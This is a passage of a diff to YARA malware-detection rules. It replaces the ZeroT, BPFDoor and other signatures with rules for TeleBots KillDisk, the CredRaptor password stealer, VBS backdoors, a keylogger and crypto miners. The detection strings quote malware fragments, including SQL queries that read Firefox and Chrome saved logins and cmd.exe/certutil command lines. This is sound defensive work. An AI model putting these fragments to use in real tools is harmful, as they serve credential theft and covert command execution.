+		hash1 = "5f9fef7974d37922ac91365588fbe7b544e13abbbde7c262fe30bade7026e118"
 
 	strings:
-		$s1 = "/svchost.exe" fullword ascii
-		$s2 = "RasTls.dll" fullword ascii
-		$s3 = "20160620.htm" fullword ascii
-		$s4 = "/20160620.htm" fullword ascii
+		$s1 = "Usage: %s iface_num\\dump [mode] [w] [-gw] [-t1 ip]" fullword ascii
+		$s2 = "Target%d found: %s - [%.2X-%.2X-%.2X-%.2X-%.2X-%.2X]" fullword ascii
+		$s3 = "3: passwords + files, no arp poison" fullword ascii
+		$s4 = "IRC Joining Keyed Channel intercepted" fullword ascii
+		$s5 = "-tX - set target ip" fullword ascii
+		$s6 = "w - save session to .pcap dump" fullword ascii
+		$s7 = "example: %s 1 1 -gw 192.168.1.1 -t1 192.168.1.3 -t2 192.168.1.5" fullword ascii
+		$s8 = "ORACLE8 DES Authorization intercepted" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5449 and filesize < 1000KB and 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of them ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_PP_CN_APT_Zerot_9 : FILE
+rule SIGNATURE_BASE_Telebots_Killdisk_1 : FILE
 {
 	meta:
-		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
+		description = "Detects TeleBots malware - KillDisk"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e1c32993-409c-5a62-8239-cff99fb83a7f"
-		date = "2017-02-03"
+		id = "111fc6bc-b790-51b9-81b7-a4716bb0aee9"
+		date = "2016-12-14"
 		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L149-L163"
+		reference = "https://goo.gl/4if3HG"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_telebots.yar#L32-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "af4b85ef01c4fa21a2506369f3bc0f8eff6e95a4cfd494e1ea11a44d75bb024e"
+		logic_hash = "e70d324c408bae1bb42b16f19cd0e6b87e8228c7480d571fef5266eee5695fd2"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a685cf4dca6a58213e67d041bba637dca9cb3ea6bb9ad3eae3ba85229118bce0"
+		hash1 = "8246f709efa922a485e1ca32d8b0d10dc752618e8b3fce4d3dd58d10e4a6a16d"
 
 	strings:
-		$x1 = "nflogger.dll" fullword ascii
-		$s7 = "Zlh.exe" fullword ascii
+		$s1 = "Plug-And-Play Support Service" fullword wide
+		$s2 = " /c \"echo Y|" fullword wide
+		$s3 = "-set=06.12.2016#09:30 -est=1410" fullword ascii
+		$s4 = "%d.%d.%d#%d:%d" fullword ascii
+		$s5 = " /T /C /G " fullword wide
+		$s6 = "[-] > %ls" fullword wide
+		$s7 = "[+] > %ls" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 4 of them ) or ( 6 of them )
 }
-rule SIGNATURE_BASE_CN_APT_Zerot_Nflogger : FILE
+rule SIGNATURE_BASE_Telebots_Killdisk_2 : FILE
 {
 	meta:
-		description = "Chinese APT by Proofpoint ZeroT RAT  - file nflogger.dll"
+		description = "Detects TeleBots malware - KillDisk"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0d23f312-e3b6-5c23-855b-25ae54265512"
-		date = "2017-02-04"
+		id = "7797187f-c94b-5323-ae43-2dc001f0b481"
+		date = "2016-12-14"
 		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L165-L178"
+		reference = "https://goo.gl/4if3HG"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_telebots.yar#L53-L68"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "dc9b19e3c4c321cb9f840ec9ff78bec9e4a075cc62ea2823d92a3fbd9f99cc07"
+		logic_hash = "e4ae09a226c4eecae18e685423ef30b3776be518609f89a078c647fe8ee00f19"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "946adbeb017616d56193a6d43fe9c583be6ad1c7f6a22bab7df9db42e6e8ab10"
+		hash1 = "26173c9ec8fd1c4f9f18f89683b23267f6f9d116196ed15655e9cb453af2890e"
 
 	strings:
-		$x1 = "\\LoaderDll.VS2010\\Release\\" ascii
+		$s1 = "Plug-And-Play Support Service" fullword wide
+		$s2 = " /c \"echo Y|" fullword wide
+		$s3 = "%d.%d.%d#%d:%d" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them )
 }
-rule SIGNATURE_BASE_CN_APT_Zerot_Extracted_Go : FILE
+rule SIGNATURE_BASE_Telebots_Credraptor_Password_Stealer : FILE
 {
 	meta:
-		description = "Chinese APT by Proofpoint ZeroT RAT  - file Go.exe"
+		description = "Detects TeleBots malware - CredRaptor Password Stealer"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ba929e6d-4162-58e7-b8a8-bcb066b64522"
-		date = "2017-02-04"
+		id = "f594a946-13b4-5179-9029-a0730634d55f"
+		date = "2016-12-14"
 		modified = "2023-01-06"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L180-L203"
+		reference = "https://goo.gl/4if3HG"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_telebots.yar#L70-L88"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bf5e2d825e4bd63e94455ffb4013fa1088098a826390c1916c0aa50866588fcb"
+		logic_hash = "ed884cb7643a61109f87e2887bed7ddb838c73bce28812b76c35bb807629e116"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "83ddc69fe0d3f3d2f46df7e72995d59511c1bfcca1a4e14c330cb71860b4806b"
+		hash1 = "50b990f6555055a265fde98324759dbc74619d6a7c49b9fd786775299bf77d26"
 
 	strings:
-		$x1 = "%s\\cmd.exe /c %s\\Zlh.exe" fullword ascii
-		$x2 = "\\BypassUAC.VS2010\\Release\\" ascii
-		$s1 = "Zjdsf.exe" fullword ascii
-		$s2 = "SS32prep.exe" fullword ascii
-		$s3 = "windowsgrep.exe" fullword ascii
-		$s4 = "Sysdug.exe" fullword ascii
-		$s5 = "Proessz.exe" fullword ascii
-		$s6 = "%s\\Zlh.exe" fullword ascii
-		$s7 = "/C %s\\%s" fullword ascii
+		$s1 = "C:\\Documents and Settings\\Administrator\\Desktop\\GetPAI\\Out\\IE.pdb" fullword ascii
+		$s2 = "SELECT encryptedUsername, encryptedPassword, hostname,httpRealm FROM moz_logins" fullword ascii
+		$s3 = "SELECT ORIGIN_URL,USERNAME_VALUE,PASSWORD_VALUE FROM LOGINS" fullword ascii
+		$s4 = ".\\PAI\\IEforXPpasswords.txt" ascii
+		$s5 = "\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" ascii
+		$s6 = "Opera old version credentials" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or ( 7 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_CN_APT_Zerot_Extracted_Mcutil : FILE
+rule SIGNATURE_BASE_Telebots_VBS_Backdoor_1 : FILE
 {
 	meta:
-		description = "Chinese APT by Proofpoint ZeroT RAT  - file Mcutil.dll"
+		description = "Detects TeleBots malware - VBS Backdoor"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c887d36b-8aeb-54f1-a683-727561723238"
-		date = "2017-02-04"
+		id = "2b711f66-8ec5-5b9a-a762-7e6668c821c9"
+		date = "2016-12-14"
 		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L205-L223"
+		reference = "https://goo.gl/4if3HG"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_telebots.yar#L90-L106"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "edb6000fd65d6593bd94842e60ec099c5a652d10005f81d17063dba1a2e267d2"
+		logic_hash = "4ff4963058674cf71c123af74c0947da2edf3b5e2622261d14200f406dbe2992"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "266c06b06abbed846ebabfc0e683f5d20dadab52241bc166b9d60e9b8493b500"
+		hash1 = "eb31a918ccc1643d069cf08b7958e2760e8551ba3b88ea9e5d496e07437273b2"
 
 	strings:
-		$s1 = "LoaderDll.dll" fullword ascii
-		$s2 = "QageBox1USER" fullword ascii
-		$s3 = "xhmowl" fullword ascii
-		$s4 = "?KEYKY" fullword ascii
-		$s5 = "HH:mm:_s" fullword ascii
-		$s6 = "=licni] has maX0t" fullword ascii
+		$s1 = "cmd = \"cmd.exe /c \" + arg + \" >\" + outfile +\" 2>&1\"" fullword ascii
+		$s2 = "GetTemp = \"c:\\WINDOWS\\addins\"" fullword ascii
+		$s3 = "elseif (arg0 = \"-dump\") Then" fullword ascii
+		$s4 = "decode = \"certutil -decode \" + source + \" \" + dest  " fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 90KB and 3 of them ) or ( all of them )
+		( uint16( 0 ) == 0x6553 and filesize < 8KB and 1 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_CN_APT_Zerot_Extracted_Zlh : FILE
+rule SIGNATURE_BASE_Telebots_VBS_Backdoor_2 : FILE
 {
 	meta:
-		description = "Chinese APT by Proofpoint ZeroT RAT - file Zlh.exe"
+		description = "Detects TeleBots malware - VBS Backdoor"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4c8b9a90-6cb3-5aba-a993-f73207341d0e"
-		date = "2017-02-04"
+		id = "151849af-f1d0-529c-94f2-287312f6515e"
+		date = "2016-12-14"
 		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cn_pp_zerot.yar#L225-L241"
+		reference = "https://goo.gl/4if3HG"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_telebots.yar#L108-L123"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "26796f75a8302bd6c93eb3ea43d0491b86770b52bd11aad6e1e250d968a77004"
+		logic_hash = "299a2ca6eacc29b4a7697a8502a56cffda4f6bc6b3354d3cc133712c1755c476"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "711f0a635bbd6bf1a2890855d0bd51dff79021db45673541972fe6e1288f5705"
+		hash1 = "1b2a5922b58c8060844b43e14dfa5b0c8b119f281f54a46f0f1c34accde71ddb"
 
 	strings:
-		$s1 = "nflogger.dll" fullword wide
-		$s2 = "%s %d: CreateProcess('%s', '%s') failed. Windows error code is 0x%08x" fullword ascii
-		$s3 = "_StartZlhh(): Executed \"%s\"" ascii
-		$s4 = "Executable: '%s' (%s) %i" fullword ascii
+		$s1 = "cmd = \"cmd.exe /c \" + arg + \" \" + arg2" fullword ascii
+		$s2 = "Dim WMI:  Set WMI = GetObject(\"winmgmts:\\\\.\\root\\cimv2\")" fullword ascii
+		$s3 = "cmd = \"certutil -encode -f \" + source + \" \" + dest" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them )
+		( uint16( 0 ) == 0x6944 and filesize < 30KB and 1 of them ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_Trojan_ISMRAT_Gen : FILE
+rule SIGNATURE_BASE_Telebots_Win64_Spy_Keylogger_G : FILE
 {
 	meta:
-		description = "ISM RAT"
-		author = "Ahmed Zaki"
-		id = "e72241ce-d6ee-5cb7-a83d-157161938d83"
-		date = "2023-12-05"
+		description = "Detects TeleBots malware - Win64 Spy KeyLogger G"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fd16a198-1b28-532b-a1ba-70680469ec51"
+		date = "2016-12-14"
 		modified = "2023-12-05"
-		reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2017/february/ism-rat/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ism_rat.yar#L9-L25"
+		reference = "https://goo.gl/4if3HG"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_telebots.yar#L125-L144"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c4d26f79b8110e92a5e427de303eca6eaf79765a4c9cc437864dc5160ef2e343"
+		logic_hash = "1b4db8f290bd4f943a90669afd5bff6b766d0723fb3ee9c69d7097e737beadc8"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
-		hash1 = "146a112cb01cd4b8e06d36304f6bdf7b"
-		hash2 = "fa3dbe37108b752c38bf5870b5862ce5"
-		hash3 = "bf4b07c7b4a4504c4192bd68476d63b5"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e3f134ae88f05463c4707a80f956a689fba7066bb5357f6d45cba312ad0db68e"
 
 	strings:
-		$s1 = "WinHTTP Example/1.0" wide
-		$s2 = "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0" wide
-		$s3 = "|||Command executed successfully"
-		$dir = /Microsoft\\Windows\\Tmpe[a-z0-9]{2,8}/
+		$s1 = "C:\\WRK\\GHook\\gHook\\x64\\Debug\\gHookx64.pdb" fullword ascii
+		$s2 = "Install hooks error!" fullword wide
+		$s4 = "%ls%d.~tmp" fullword wide
+		$s5 = "[*]Window PID > %d: " fullword wide
+		$s6 = "Install hooks ok!" fullword wide
+		$s7 = "[!]Clipboard paste" fullword wide
+		$s9 = "[*] IMAGE : %ls" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Scarcruft_Malware_Feb18_1 : FILE
+rule SIGNATURE_BASE_Coinminer_Strings : SCRIPT HIGHVOL FILE
 {
 	meta:
-		description = "Detects Scarcruft malware - February 2018"
-		author = "Florian rootpath"
-		id = "43a87f2a-cf60-5035-8d40-c360a789a1ac"
-		date = "2018-02-03"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/craiu/status/959477129795731458"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_scarcruft.yar#L2-L15"
+		description = "Detects mining pool protocol string in Executable"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ac045f83-5f32-57a9-8011-99a2658a0e05"
+		date = "2018-01-04"
+		modified = "2021-10-26"
+		reference = "https://minergate.com/faq/what-pool-address"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/pua_cryptocoin_miner.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fa1ed130518a2096bd731dce917512d560160e271ad8f0ccd57fbedd478a5502"
-		score = 90
+		logic_hash = "2d63bf90560c83ab6c09e0c82b6a6449bca6e7e7d0945d3782c2fa9a726b2ca1"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = "SCRIPT, HIGHVOL, FILE"
+		nodeepdive = 1
 
 	strings:
-		$x1 = "d:\\HighSchool\\version 13\\2ndBD\\T+M\\" ascii
-		$x2 = "cmd.exe /C ping 0.1.1.2" wide
+		$sa1 = "stratum+tcp://" ascii
+		$sa2 = "stratum+udp://" ascii
+		$sb1 = "\"normalHashing\": true,"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
+		filesize < 3000KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_LNX_Redmenshen_Bpfdoor_May23_1 : FILE
+rule SIGNATURE_BASE_Coinhive_Javascript_Monerominer : HIGHVOL FILE
 {
 	meta:
-		description = "Detects BPFDoor malware"
-		author = "Florian Roth"
-		id = "25df4dba-ec6e-5999-b6be-56fe933cb0d0"
-		date = "2023-05-11"
+		description = "Detects CoinHive - JavaScript Crypto Miner"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4f40c342-fcdc-5c73-a3cf-7b2ed438eaaf"
+		date = "2018-01-04"
 		modified = "2023-12-05"
-		reference = "https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lnx_implant_may22.yar#L3-L42"
+		reference = "https://coinhive.com/documentation/miner"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/pua_cryptocoin_miner.yar#L20-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c58971a43443800256e791b4f9fe7c3221518b0050e5f2964b6c843ddb4549ac"
-		score = 80
+		logic_hash = "4146b034a9785f1bb7c60db62db0e478d960f2ac9adb7c5b74b365186578ca47"
+		score = 50
 		quality = 85
-		tags = "FILE"
-		hash1 = "afa8a32ec29a31f152ba20a30eb483520fe50f2dce6c9aa9135d88f7c9c511d7"
+		tags = "HIGHVOL, FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "[-] Execute command failed" ascii fullword
-		$x2 = "/var/run/initd.lock" ascii fullword
-		$xc1 = { 2F 00 3E 3E 00 65 78 69 74 00 72 00 }
-		$sc1 = { 9F CD 30 44 }
-		$sc2 = { 66 27 14 5E }
-		$sa1 = "TLS-CHACHA20-POLY1305-SHA256" ascii fullword
-		$sop1 = { 48 83 c0 01 4c 39 f8 75 ea 4c 89 7c 24 68 48 69 c3 d0 00 00 00 48 8b 5c 24 50 48 8b 54 24 78 48 c7 44 24 38 00 00 00 00 }
-		$sop2 = { 48 89 de f3 a5 89 03 8b 44 24 2c 39 44 24 28 44 89 4b 04 48 89 53 10 0f 95 c0 }
-		$sop3 = { 49 d3 cd 4d 31 cd b1 29 49 89 e9 49 d3 c8 4d 31 c5 4c 03 68 10 48 89 f9 }
+		$s2 = "CoinHive.CONFIG.REQUIRES_AUTH" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 900KB and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or 4 of them or ( all of ( $sc* ) and $sc1 in ( @sc2 [ 1 ] -50 .. @sc2 [ 1 ] + 50 ) ) ) or ( 2 of ( $x* ) or 5 of them )
+		filesize < 65KB and 1 of them
 }
-rule SIGNATURE_BASE_APT_MAL_LNX_Redmenshen_Bpfdoor_Controller_May22_1 : FILE
+rule SIGNATURE_BASE_PUA_Cryptominer_Jan19_1 : FILE
 {
 	meta:
-		description = "Detects unknown Linux implants (uploads from KR and MO)"
+		description = "Detects Crypto Miner strings"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1438c3bf-3c42-59d5-9f3f-2d72bdaaac42"
-		date = "2022-05-05"
+		id = "aebfdce9-c2dd-5f24-aa25-071e1a961239"
+		date = "2019-01-31"
 		modified = "2023-12-05"
-		reference = "https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lnx_implant_may22.yar#L45-L76"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/pua_cryptocoin_miner.yar#L35-L52"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8de10beea4ef2e059b16d38fb015d6f091cc517b6f0c06b6ef6868518349994d"
-		score = 90
+		logic_hash = "7097d404e0317230a5f60fc66fbcb2a2a5315f8fd348a7e689aaf75c26684f9e"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		hash1 = "07ecb1f2d9ffbd20a46cd36cd06b022db3cc8e45b1ecab62cd11f9ca7a26ab6d"
-		hash2 = "4c5cf8f977fc7c368a8e095700a44be36c8332462c0b1e41bff03238b2bf2a2d"
-		hash3 = "599ae527f10ddb4625687748b7d3734ee51673b664f2e5d0346e64f85e185683"
-		hash4 = "5b2a079690efb5f4e0944353dd883303ffd6bab4aad1f0c88b49a76ddcb28ee9"
-		hash5 = "5faab159397964e630c4156f8852bcc6ee46df1cdd8be2a8d3f3d8e5980f3bb3"
-		hash6 = "93f4262fce8c6b4f8e239c35a0679fbbbb722141b95a5f2af53a2bcafe4edd1c"
-		hash7 = "97a546c7d08ad34dfab74c9c8a96986c54768c592a8dae521ddcf612a84fb8cc"
-		hash8 = "c796fc66b655f6107eacbe78a37f0e8a2926f01fecebd9e68a66f0e261f91276"
-		hash9 = "f8a5e735d6e79eb587954a371515a82a15883cf2eda9d7ddb8938b86e714ea27"
-		hash10 = "fd1b20ee5bd429046d3c04e9c675c41e9095bea70e0329bd32d7edd17ebaf68a"
+		hash1 = "ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05"
 
 	strings:
-		$s1 = "[-] Connect failed." ascii fullword
-		$s2 = "export MYSQL_HISTFILE=" ascii fullword
-		$s3 = "udpcmd" ascii fullword
-		$s4 = "getshell" ascii fullword
-		$op1 = { e8 ?? ff ff ff 80 45 ee 01 0f b6 45 ee 3b 45 d4 7c 04 c6 45 ee 00 80 45 ff 01 80 7d ff 00 }
-		$op2 = { 55 48 89 e5 48 83 ec 30 89 7d ec 48 89 75 e0 89 55 dc 83 7d dc 00 75 0? }
-		$op3 = { e8 a? fe ff ff 0f b6 45 f6 48 03 45 e8 0f b6 10 0f b6 45 f7 48 03 45 e8 0f b6 00 8d 04 02 }
-		$op4 = { c6 80 01 01 00 00 00 48 8b 45 c8 0f b6 90 01 01 00 00 48 8b 45 c8 88 90 00 01 00 00 c6 45 ef 00 0f b6 45 ef 88 45 ee }
+		$s1 = "Stratum notify: invalid Merkle branch" fullword ascii
+		$s2 = "-t, --threads=N       number of miner threads (default: number of processors)" fullword ascii
+		$s3 = "User-Agent: cpuminer/" ascii
+		$s4 = "hash > target (false positive)" fullword ascii
+		$s5 = "thread %d: %lu hashes, %s khash/s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 80KB and 2 of them or 5 of them
+		filesize < 1000KB and 1 of them
 }
-rule SIGNATURE_BASE_APT_MAL_LNX_Redmenshen_Bpfdoor_Controller_May22_2 : FILE
+rule SIGNATURE_BASE_PUA_Crypto_Mining_Commandline_Indicators_Oct21 : SCRIPT FILE
 {
 	meta:
-		description = "Detects BPFDoor implants used by Chinese actor Red Menshen"
+		description = "Detects command line parameters often used by crypto mining software"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d5c3d530-ed6f-563e-a3b0-55d4c82e4899"
-		date = "2022-05-07"
+		id = "afe5a63a-08c3-5cb7-b4b1-b996068124b7"
+		date = "2021-10-24"
 		modified = "2023-12-05"
-		reference = "https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lnx_implant_may22.yar#L78-L100"
+		reference = "https://www.poolwatch.io/coin/monero"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/pua_cryptocoin_miner.yar#L54-L88"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7525c675dbba6eb480f1d28fc6db05bd9907725c291e64ee6dc2453fd42892a0"
-		score = 85
+		logic_hash = "7ae1a77d8ff02ec539ce2b8be668530c3f509f0c408dfa7f2b749b0a4d6f45b7"
+		score = 65
 		quality = 85
-		tags = "FILE"
-		hash1 = "76bf736b25d5c9aaf6a84edd4e615796fffc338a893b49c120c0b4941ce37925"
-		hash2 = "96e906128095dead57fdc9ce8688bb889166b67c9a1b8fdb93d7cff7f3836bb9"
-		hash3 = "c80bd1c4a796b4d3944a097e96f384c85687daeedcdcf05cc885c8c9b279b09c"
-		hash4 = "f47de978da1dbfc5e0f195745e3368d3ceef034e964817c66ba01396a1953d72"
+		tags = "SCRIPT, FILE"
 
 	strings:
-		$opx1 = { 48 83 c0 0c 48 8b 95 e8 fe ff ff 48 83 c2 0c 8b 0a 8b 55 f0 01 ca 89 10 c9 }
-		$opx2 = { 48 01 45 e0 83 45 f4 01 8b 45 f4 3b 45 dc 7c cd c7 45 f4 00 00 00 00 eb 2? 48 8b 05 ?? ?? 20 00 }
-		$op1 = { 48 8d 14 c5 00 00 00 00 48 8b 45 d0 48 01 d0 48 8b 00 48 89 c7 e8 ?? ?? ff ff 48 83 c0 01 48 01 45 e0 }
-		$op2 = { 89 c2 8b 85 fc fe ff ff 01 c2 8b 45 f4 01 d0 2d 7b cf 10 2b 89 45 f4 c1 4d f4 10 }
-		$op3 = { e8 ?? d? ff ff 8b 45 f0 eb 12 8b 85 3c ff ff ff 89 c7 e8 ?? d? ff ff b8 ff ff ff ff c9 }
+		$s01 = " --cpu-priority="
+		$s02 = "--donate-level=0"
+		$s03 = " -o pool."
+		$s04 = " -o stratum+tcp://"
+		$s05 = " --nicehash"
+		$s06 = " --algo=rx/0 "
+		$se1 = "LS1kb25hdGUtbGV2ZWw9"
+		$se2 = "0tZG9uYXRlLWxldmVsP"
+		$se3 = "tLWRvbmF0ZS1sZXZlbD"
+		$se4 = "c3RyYXR1bSt0Y3A6Ly"
+		$se5 = "N0cmF0dW0rdGNwOi8v"
+		$se6 = "zdHJhdHVtK3RjcDovL"
+		$se7 = "c3RyYXR1bSt1ZHA6Ly"
+		$se8 = "N0cmF0dW0rdWRwOi8v"
+		$se9 = "zdHJhdHVtK3VkcDovL"
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 100KB and 2 of ( $opx* ) or 4 of them
+		filesize < 5000KB and 1 of them
 }
-rule SIGNATURE_BASE_APT_MAL_LNX_Redmenshen_Bpfdoor_Controller_May22_3 : FILE
+rule SIGNATURE_BASE_HKTL_Natbypass_Dec22_1 : T1090 FILE
 {
 	meta:
-		description = "Detects BPFDoor implants used by Chinese actor Red Menshen"
+		description = "Detects NatBypass tool (also used by APT41)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "91c2153a-a6e0-529e-852c-61f799838798"
-		date = "2022-05-08"
+		id = "54af4d84-72f7-5ec4-b0bf-7ba228fdf508"
+		date = "2022-12-27"
 		modified = "2023-12-05"
-		reference = "https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lnx_implant_may22.yar#L102-L119"
+		reference = "https://github.com/cw1997/NATBypass"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/hktl_natbypass.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "afec0bfeddf5c5c2abc1a3173f636c385437e5d7c0b68665f6274011113a6a9c"
-		score = 85
+		logic_hash = "8af76d7d9d4500dc219090fbd8ca8cd9fd17bfc224f14a411febfd6f75b92206"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		hash1 = "144526d30ae747982079d5d340d1ff116a7963aba2e3ed589e7ebc297ba0c1b3"
-		hash2 = "fa0defdabd9fd43fe2ef1ec33574ea1af1290bd3d763fdb2bed443f2bd996d73"
+		tags = "T1090, FILE"
